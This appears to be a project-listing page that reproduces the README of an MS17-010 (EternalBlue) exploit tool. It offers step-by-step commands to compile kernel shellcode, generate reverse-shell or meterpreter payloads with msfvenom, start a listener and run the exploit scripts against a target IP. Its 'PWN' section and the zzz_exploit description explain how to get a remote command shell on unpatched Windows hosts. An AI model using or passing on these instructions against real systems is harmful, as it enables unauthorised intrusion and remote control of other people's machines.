All Projects → 3ndG4me → Autoblue Ms17 010

3ndG4me / Autoblue Ms17 010

Licence: mit
This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Autoblue Ms17 010

Ciphey
⚡ Automatically decrypt encryptions without knowing the key or cipher, decode encodings, and crack hashes ⚡
Stars: ✭ 9,116 (+1646.36%)
Mutual labels:  hacktoberfest, hacking
Apac Conferences
A community contributed consolidated list of InfoSec meetups in the Asia Pacific region.
Stars: ✭ 90 (-82.76%)
Mutual labels:  hacktoberfest, hacking
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 32,909 (+6204.41%)
Mutual labels:  hacktoberfest, hacking
Name That Hash
🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 3000+ other hashes ☄ Comes with a neat web app 🔥
Stars: ✭ 540 (+3.45%)
Mutual labels:  hacktoberfest, hacking
Juice Shop Ctf
Capture-the-Flag (CTF) environment setup tools for OWASP Juice Shop
Stars: ✭ 238 (-54.41%)
Mutual labels:  hacktoberfest, hacking
Github Dorks
Find leaked secrets via github search
Stars: ✭ 1,332 (+155.17%)
Mutual labels:  hacktoberfest, hacking
Chaos
🔥 CHAOS is a Remote Administration Tool that allow generate binaries to control remote operating systems.
Stars: ✭ 1,168 (+123.75%)
Mutual labels:  hacktoberfest, hacking
Juice Shop
OWASP Juice Shop: Probably the most modern and sophisticated insecure web application
Stars: ✭ 6,270 (+1101.15%)
Mutual labels:  hacktoberfest, hacking
Getjs
A tool to fastly get all javascript sources/files
Stars: ✭ 190 (-63.6%)
Mutual labels:  hacktoberfest, hacking
Nosqlmap
Automated NoSQL database enumeration and web application exploitation tool.
Stars: ✭ 1,928 (+269.35%)
Mutual labels:  hacktoberfest, hacking
Rustscan
🤖 The Modern Port Scanner 🤖
Stars: ✭ 5,218 (+899.62%)
Mutual labels:  hacktoberfest, hacking
Reconpi
ReconPi - A lightweight recon tool that performs extensive scanning with the latest tools.
Stars: ✭ 490 (-6.13%)
Mutual labels:  hacktoberfest, hacking
Guide
The official guide for discord.js, created and maintained by core members of its community
Stars: ✭ 512 (-1.92%)
Mutual labels:  hacktoberfest
Apisprout
Lightweight, blazing fast, cross-platform OpenAPI 3 mock server with validation
Stars: ✭ 519 (-0.57%)
Mutual labels:  hacktoberfest
Devjoke
#DevJoke. Submit a PR if you know a good dev joke.
Stars: ✭ 516 (-1.15%)
Mutual labels:  hacktoberfest
Sentry Symfony
The official Symfony SDK for Sentry (sentry.io)
Stars: ✭ 515 (-1.34%)
Mutual labels:  hacktoberfest
Free Courses
Free IT courses
Stars: ✭ 522 (+0%)
Mutual labels:  hacktoberfest
Algorithmic Pseudocode
This repository contains the pseudocode(pdf) of various algorithms and data structures necessary for Interview Preparation and Competitive Coding
Stars: ✭ 519 (-0.57%)
Mutual labels:  hacktoberfest
Messagekit
A community-driven replacement for JSQMessagesViewController
Stars: ✭ 5,036 (+864.75%)
Mutual labels:  hacktoberfest
Octolinker
OctoLinker — Links together, what belongs together
Stars: ✭ 4,853 (+829.69%)
Mutual labels:  hacktoberfest

MS17-010 Exploit Code

This is some no-bs public exploit code that generates valid shellcode for the eternal blue exploit and scripts out the event listener with the metasploit multi-handler.

This version of the exploit is prepared in a way where you can exploit eternal blue WITHOUT metasploit. Your options for auto shell generation are to generate shellcode with msfvenom that has meterpreter (i.e. with metasploit) or to generate a normal windows cmd shell (i.e. without metasploit). You may also select between staged and stageless payloads if you wish to avoid utilizing the msfconsole entirely and use netcat/your own shell handler. Alternatively you can elect to brew in your own shellcode.

This allows for this version of the MS17-010 exploit to be a bit more flexible, and also fully functional, as many exploits leave out the steps to compile the kernel shellcode that usually comes with it.

Included is also an enternal blue checker script that allows you to test if your target is potentially vulnerable to MS17-010

run python eternal_checker.py <TARGET-IP>

Requirements

Core exploit code requires impacket and the mysmb.py library (included with the repo). To install any requirements simply use pip on the requirements.txt file. It's always recommended you use a virtual environment like venv when installing python dependencies, but use whatever you like.

Additionally, the helper scripts below require the Metasploit Framework to be installed. At minimum you will need msfvenom for the shell_prep.sh but stageless command shells can be caught like any normal command shell without the use of Metasploit's multi/handler. Otherwise, simply install the metasploit framework and insure it is in your path.

IMPORTANT SUPPORT INFO:

Keep in mind python2 is not officially supported anymore. The original exploit code that is provided was initially built for python2, going forward any errors discovered will be adjusted for insuring the code works with python3 instead of python2. Instructions below assume python/pip are python3 by default, so if you are using python2 update based on your own paths when necessary and remember, it is NOT officially supported by this repo.

Python2

pip2.7 install -r requirements.txt

Python3

pip install -r requirements.txt

TODO:

  • [x] Validate python3 compatibility
  • [ ] Testing with non-msfvenom shellcode

VIDEO TUTORIALS:

USAGE:

Navigate to the shellcode directory in the repo:

run ./shell_prep.sh

Follow the prompts, for example:

                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
<SOME PORT>
LPORT you want x86 to listen on:
<SOME OTHER PORT>
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0

After the script finishes there will be a shellcode binary named sc_all.bin in the shellcode directory

Next, navigate to the main repo directory:

run listener_prep.sh

Follow the prompts, for example:

 /,-
  ||)
  \\_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
<YOUR-IP>
LPORT for x64 reverse connection:
<SOME PORT>
LPORT for x86 reverse connection:
<SOME OTHER PORT>
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Starting listener...

PWN:

If you have completed the USAGE steps, now you're ready to PWN the target.

run:

python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>

Alternatively you may use zzz_exploit.py which is an implementation of the "Eternal" family that uses the same technique from Eternal Romance, Synergy, and Champion.

This is not setup to send back a reverse shell or execute any sort of payload like Eternal Blue is. This uses the functions from mysmb.py to spawn a semi-interactive cmd shell. There are commented out sections of code that can be modified to interact with metasploit or send of custom payloads using the service_exec() function call.

All of the code execution functionality can be found in the do_system_mysmb_session() function.

This version of the exploit is great for targeting systems that have named pipes available to avoid crashing the target.

run:

python zzz_exploit.py <TARGET-IP>

Enternal Blue has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64)

zzz has only been tested on Windows XP

However the Eternal Blue exploits included in this repo also include support for Windows 8/Server 2012 and should work.

The zzz exploit should also work on all targets provided you have access to a named pipe. For some OS's (Windows 10) this may also require credentials of a user who can access this named pipe (This is because on newer versions, Guest and NULL sessions are not supported out of the box).

The original exploit code that this repo pulls from is located here: https://github.com/worawit/MS17-010

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].